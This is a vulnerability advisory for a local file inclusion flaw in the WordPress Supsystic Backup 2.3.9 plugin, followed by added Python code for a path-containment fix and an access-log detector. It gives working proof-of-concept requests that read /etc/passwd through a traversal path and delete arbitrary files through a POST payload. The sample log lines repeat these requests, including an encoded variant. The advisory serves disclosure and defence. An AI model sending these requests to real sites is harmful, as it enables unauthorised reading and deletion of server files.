WordPress Supsystic Backup 2.3.9 Local File Inclusion

WordPress Supsystic Backup plugin version 2.3.9 suffers from a local file inclusion vulnerability.

# 1. Description

Changing the path when downloading the stored backup allows an attacker to both read and delete internal system files (LFI).


# 2. Proof of Concept (PoC)

Create a backup. When downloading the backup, change its path:

GET http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd


The "Delete" tab also allows an attacker to delete files on the server:

POST http://192.168.0.49/wp-admin/admin.php?page=supsystic-backup&tab=bupLog
Payload: reqType=ajax&page=backup&action=removeAction&filename=[FILE PATH]&deleteLog=1&pl=bup
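Both vectors above come from the same defect: a user-supplied file name is joined to the backup directory without checking that the result stays inside it. The following is an added example, not the plugin's own code, showing the containment check a download or delete handler should apply, plus a small detector that scans access-log lines for traversal sequences in the `download` and `filename` parameters of the `supsystic-backup` admin page. `BACKUP_DIR` and the log lines are constructed assumptions; the advisory does not state the plugin's real storage path. Note that the delete vector sends `filename` in the POST body, which ordinary access logs do not record, so catching that one needs a WAF or application-level log rather than this query-string scan.

```python
"""Added example (not the Supsystic Backup plugin's code): a path-containment
check for backup file names and a detector for traversal attempts in access
logs for the admin page described in the advisory."""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse, parse_qs, unquote

# Hypothetical backup directory; the plugin's real path is not given on the page.
BACKUP_DIR = "/var/www/html/wp-content/uploads/backup-supsystic"


def resolve_backup_file(user_name: str, backup_dir: str = BACKUP_DIR) -> Optional[str]:
    """Return the absolute path for a requested backup file only if it lies
    inside backup_dir; otherwise return None. Containment is decided on the
    normalised path, not by a '..' substring test, so absolute names and
    mixed separators are handled the same way."""
    if not user_name or "\x00" in user_name:
        return None
    root = os.path.normpath(backup_dir)
    # os.path.join discards root if user_name is absolute; normpath then
    # collapses any '..' components so the result can be compared to root.
    candidate = os.path.normpath(os.path.join(root, user_name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Encoded and raw traversal sequences; values are checked before and after decoding.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e%5c|\.\.%2f|\.\.%5c)", re.IGNORECASE)

# Apache/nginx combined log format (client, ident, user, time, request, status).
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str, str, str, str]]:
    """Return (client_ip, method, parameter, decoded_value, status) for every
    request to page=supsystic-backup whose download/filename query parameter
    carries a traversal sequence. Other pages are ignored to keep noise down."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        qs = parse_qs(urlparse(target).query, keep_blank_values=True)
        if "supsystic-backup" not in qs.get("page", []):
            continue
        for param in ("download", "filename"):
            for value in qs.get(param, []):
                decoded = unquote(value)  # parse_qs decoded once; handle double-encoding
                parts = decoded.replace("\\", "/").split("/")
                if TRAVERSAL.search(value) or TRAVERSAL.search(decoded) or ".." in parts:
                    hits.append((ip, method, param, decoded, status))
    return hits


# Constructed sample log lines: one legitimate download, the advisory's own
# traversal request, a URL-encoded variant of it, and an unrelated page.
LOG_LINES = [
    '192.168.0.10 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=backup_2023-10-10.zip HTTP/1.1" 200 512',
    '192.168.0.10 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '192.168.0.11 - - [10/Oct/2023:13:57:12 +0000] "GET /wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '192.168.0.12 - - [10/Oct/2023:13:58:40 +0000] "GET /wp-admin/admin.php?page=other-plugin&file=../../etc/passwd HTTP/1.1" 404 0',
]


if __name__ == "__main__":
    print("safe   :", resolve_backup_file("backup_2023-10-10.zip"))
    print("blocked:", resolve_backup_file("../../../../../../../../../etc/passwd"))
    for hit in flag_traversal_requests(LOG_LINES):
        print("traversal attempt:", hit)
```

The containment check is the fix a patched handler needs; a `str_replace('..', '', $name)` style filter is not equivalent, since it leaves absolute paths and encoded variants alone. The detector only tells you an attempt reached the endpoint; a `200` status on such a request, as in the sample lines, is the signal that the file was actually served and the host should be treated as compromised.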